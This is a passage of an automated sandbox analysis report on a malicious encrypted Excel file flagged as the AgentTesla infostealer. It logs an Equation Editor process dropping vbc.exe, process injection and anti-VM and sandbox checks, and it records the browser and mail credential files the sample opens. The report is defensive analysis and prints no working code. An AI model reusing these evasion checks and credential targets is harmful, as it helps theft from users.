Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB134	5_2_049FB134
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA94A	5_2_049FA94A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB17C	5_2_049FB17C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAD68	5_2_049FAD68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAAA5	5_2_049FAAA5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAEC1	5_2_049FAEC1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAAEA	5_2_049FAAEA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FE23B	5_2_049FE23B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAE37	5_2_049FAE37
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FCE30	5_2_049FCE30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB62D	5_2_049FB62D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FCA20	5_2_049FCA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAE7C	5_2_049FAE7C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAA60	5_2_049FAA60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAF90	5_2_049FAF90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FABB2	5_2_049FABB2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAFD5	5_2_049FAFD5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAF06	5_2_049FAF06
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAB2F	5_2_049FAB2F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAF4B	5_2_049FAF4B

Source: 0AX4532QWSA.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: new[1].exe.2.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/12@16/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$0AX4532QWSA.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF47B.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: 0AX4532QWSA.xlsx

Static file information: File size 1385984 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: 0AX4532QWSA.xlsx

Initial sample: OLE indicators vbamacros = False

Source: 0AX4532QWSA.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0xE7B499BF [Sun Mar 8 17:45:35 2093 UTC]

Source: C:\Users\Public\vbc.exe	Code function: 4_2_01147D93 push edi; retf	4_2_01147D9E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01140A9A pushfd ; iretd	4_2_01140AA1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA34FC push FFFFFF8Bh; retf	5_2_00CA34FF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA174 push ss; ret	5_2_049FA177

Source: initial sample

Static PE information: section name: .text entropy: 7.9258080582

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Users\Public\vbc.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: 0AX4532QWSA.xlsx

Stream path 'EncryptedPackage' entropy: 7.99986275596 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME8
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL8

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\Public\vbc.exe

Window / User API: threadDelayed 9689

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2360	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2788	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2836	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2800	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3060	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3060	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMWARE8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: Fm%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: QEMU8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMWAREHDGm
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMwareHDGm
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: Fm"SOFTWARE\VMware, Inc.\VMware Tools8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: vmware8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMware HDGm

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}			Jump to behavior

Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\Public\vbc.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 960, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
